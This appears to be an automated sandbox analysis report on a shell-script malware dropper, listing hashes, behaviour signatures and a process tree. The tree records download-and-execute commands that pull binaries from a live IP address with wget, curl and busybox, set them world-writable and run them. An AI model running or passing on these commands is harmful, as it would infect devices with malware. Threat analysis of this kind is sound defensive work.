Analysis
-
max time kernel
93s -
max time network
92s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
-
Size
10KB
-
MD5
9a652a59ec3ea4f4b578b2c9f0e9c25c
-
SHA1
8c2b441f097c1f3c910ef9adb5b6816ddd60213b
-
SHA256
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19
-
SHA512
c68e93af48af16ba88fb94f6a8a874da524ac9fd19cb25abf57ac44b802ad1c202783ccdaca8d1876e6b4fcbec0b9f2080c1b06d78f60845281d78bb3b2b2216
-
SSDEEP
192:g3P87X+A6ZsXTqpx+PiAX0kvXTqpx73P87X6M0kXf:eA0YP5/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:731
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:738
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:748
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:792
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:801
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:817
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:841
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:852
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:858
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:864
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:870
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:876
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:882
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:888
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:894
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:900
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:906
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:912
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:918
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:924
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:930
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:936
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:942
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:948
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:954
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:960
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:966
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:972
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97